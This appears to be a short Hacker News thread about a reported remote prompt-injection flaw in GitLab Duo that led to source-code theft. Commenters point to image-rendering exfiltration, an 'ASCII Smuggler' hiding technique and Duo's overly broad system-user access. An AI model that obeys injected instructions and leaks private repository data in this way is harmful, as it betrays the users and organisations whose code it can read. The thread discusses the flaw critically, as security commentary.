Remote Prompt Injection in Gitlab Duo Leads to Source Code Theft

legitsecurity.com

29 points by chillax 19 hours ago


cedws - 15 hours ago

Until prompt injection is fixed, if it is ever, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.

wunderwuzzi23 - 8 hours ago

Great work!

Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it's concerning that big vendors do not catch these before shipping.

I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in past with 10+ findings across vendors.

GitHub Copilot Chat had a very similar bug last year.

mdaniel - 11 hours ago

Running Duo as a system user was crazypants and I'm sad that GitLab fell into that trap. They already have personal access tokens so even if they had to silently create one just for use with Duo that would be a marked improvement over giving an LLM read access to every repo in the platform

aestetix - 3 hours ago

Does that mean Gitlab Duo can run Doom?

nusl - 16 hours ago

GitLab's remediation seems a bit sketchy at best.